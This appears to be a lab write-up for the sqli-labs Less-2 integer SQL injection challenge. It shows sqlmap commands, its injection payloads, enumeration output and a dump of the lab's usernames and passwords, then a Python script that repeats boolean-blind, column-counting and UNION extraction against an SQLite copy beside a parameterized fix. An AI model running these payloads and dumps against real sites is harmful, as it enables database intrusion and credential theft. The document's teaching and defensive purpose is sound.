Challenge URL: http://web-labs.rinue.top/sqli-labs/Less-2
Method 1: sqlmap
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8793=8793

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 7770 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(7770=7770,1))),0x7178706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6195 FROM (SELECT(SLEEP(5)))dCRn)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6064 UNION ALL SELECT NULL,NULL,CONCAT(0x71767a6b71,0x7668425342434b6e77446c74636950446778495a765543756c7a77524556537a78714a464d5a6a4b,0x7178706a71)-- RFsl
---
Two things to read off this output before moving on. None of the payloads contains a quote character: the id value is interpolated into the query as a bare integer, so nothing has to be closed or commented out around it (this is what distinguishes Less-2 from the quoted Less-1). The UNION payload also tells you the vulnerable SELECT returns exactly 3 columns, and the hex constants 0x71767a6b71 / 0x7178706a71 are sqlmap's marker strings that bracket the extracted value so it can be located in the response.
Enumerate databases
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch --dbs
available databases [8]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] Python
[*] security
[*] SQL5
[*] YaoGuang
Enumerate the tables in the security database
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security --tables
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
Enumerate the columns of the users table
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security -T users --columns
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
Dump the table contents
Database: security
Table: users
[13 entries]
+------------+----------+
| password   | username |
+------------+----------+
| Dumb       | Dumb     |
| I-kill-you | Angelina |
| p@ssword   | Dummy    |
| crappy     | secure   |
| stupidity  | stupid   |
| genious    | superman |
| mob!le     | batman   |
| admin      | admin    |
| admin1     | admin1   |
| admin2     | admin2   |
| admin3     | admin3   |
| dumbo      | dhakkan  |
| admin4     | admin4   |
+------------+----------+
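The script below is an added example, not code from this writeup or from sqli-labs. It rebuilds the parts of the sqlmap findings that do not depend on MySQL (the boolean-based blind check, counting the 3 columns with ORDER BY, and a UNION dump pulled one row at a time) against an in-memory SQLite copy of security.users with the columns from the --columns output, and puts the parameterized lookup that stops all of them next to the vulnerable one. The query shape `WHERE id=<input> LIMIT 0,1` is an assumption modelled on the quote-free sqlmap payloads, the seed rows are a constructed subset of the dump above, and the SLEEP()/FLOOR(RAND()) payloads are left out because SQLite has no equivalent.

```python
"""Offline model of the integer-based injection sqlmap reported for Less-2.

Added example (not the writeup's or sqli-labs' code). The vulnerable query
shape and the seed rows are assumptions; see the lead-in above.
"""
import sqlite3

# Constructed sample data: a subset of the rows in the sqlmap dump.
SEED_ROWS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
    (4, "secure", "crappy"),
    (5, "stupid", "stupidity"),
    (6, "superman", "genious"),
    (7, "batman", "mob!le"),
    (8, "admin", "admin"),
]


def make_db():
    """In-memory stand-in for security.users (same three columns as --columns shows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?)", SEED_ROWS)
    return db


def vulnerable_lookup(db, user_id):
    """Less-2 style (assumed shape): the id parameter is pasted into the SQL unquoted."""
    sql = f"SELECT id, username, password FROM users WHERE id={user_id} LIMIT 0,1"
    return db.execute(sql).fetchone()


def safe_lookup(db, user_id):
    """Hardened form: enforce the integer type first, then bind the value."""
    uid = int(user_id)  # "1 AND 8793=8793" raises ValueError before any SQL runs
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return db.execute(sql, (uid,)).fetchone()


def boolean_blind(db):
    """sqlmap's first finding: a true and a false AND clause yield different responses."""
    true_row = vulnerable_lookup(db, "1 AND 8793=8793")
    false_row = vulnerable_lookup(db, "1 AND 8793=8794")
    return true_row is not None and false_row is None


def count_columns(db, max_cols=10):
    """ORDER BY n succeeds until n exceeds the column count of the original SELECT."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(db, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:  # "ORDER BY term out of range"
            return n - 1
    return max_cols


def union_dump(db):
    """sqlmap's UNION finding, done by hand: a negative id empties the left side,
    the right side selects what we want into the 3rd column, and the trailing
    comment removes the application's own LIMIT. Rows are pulled one at a time
    with LIMIT 1 OFFSET i, which is how a manual dump proceeds."""
    creds = []
    i = 0
    while True:
        payload = (f"-6064 UNION ALL SELECT NULL,NULL,username||':'||password "
                   f"FROM users LIMIT 1 OFFSET {i} -- x")
        row = vulnerable_lookup(db, payload)
        if row is None:
            break
        creds.append(row[2])
        i += 1
    return creds


if __name__ == "__main__":
    db = make_db()
    print("boolean-blind works:", boolean_blind(db))
    print("columns in vulnerable SELECT:", count_columns(db))
    for cred in union_dump(db):
        print(cred)
```

The column-count probe reports 3, matching "Generic UNION query (NULL) - 3 columns" above; the UNION dump returns username:password pairs because the third column is the only one echoed. The fix is the `int()` cast plus the bound parameter in safe_lookup: the cast rejects every payload shown by sqlmap, and binding means even a numeric-looking string never becomes part of the SQL text.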
Method 2: manual injection
。。。